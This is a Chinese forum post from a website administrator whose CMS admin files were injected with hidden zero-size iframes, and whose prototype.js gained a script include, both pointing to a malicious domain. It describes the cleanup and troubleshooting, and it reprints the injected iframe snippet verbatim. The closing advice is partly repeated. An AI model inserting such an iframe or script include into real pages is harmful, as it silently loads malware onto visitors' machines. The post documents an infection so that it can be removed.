用的风讯的程序,前些时候进后台的时候,杀毒软件经常提示有"s.gcuj.com"这个提示是恶意脚本.
今天仔细检查了一下,整个程序admin文件中的全部文件都被加上了以下代码:
<iframe src="http://s.gcuj.com/bd.htm?019" width="0" height="0" frameborder="0"></iframe><iframe src="http://s.gcuj.com/bd.htm?019" width="0" height="0" frameborder="0"></iframe><iframe src="http://s.gcuj.com/bd.htm?019" width="0" height="0" frameborder="0"></iframe>
上网一查有人说这是被值入的木马,我晕..., 所有后台管理的文件都有以上这串代码,
这该如何解决?我把后台登陆的这个代码删除后,发现admin系统管理员帐户登陆不上去了,其他的还可以,
不知道是我长时间没有登陆导致的还是被删除这段代码后登陆不上去?
但总的一句话,上面这串代码已经认定为是木马,现在着急要处理,否则以后可能会麻烦..
2007年5月24日最新增加:
把网站上所有文件下载到本地计算机,然后用DREAMWAVER在整个网站查找gcuj,那还不快,几分钟以后,在我网站的prototype.js文件的最后多出一行,用脚本程序document.write写向了"s.gcuj.com/t.js",删除,重新上传,还是报有病毒,一想,原来是临时文件,点开IE的工具下的选项,把IE临时文件清除,终于OK了。据库到本地运行个新的论坛文件看看,是否是数据库问题,如果数据库没有问题,建议你替换一下论坛文件。做之前请先备份。
网站后台因此打不开:应该是这个原因,你可以看一下是否是在 index.asp conn.asp 里加上的代码。如果找不到,建议你下载数据库到本地运行个新的论坛文件看看,是否是数据库问题,如果数据库没有问题,建议你替换一下论坛文件。做之前请先备份。
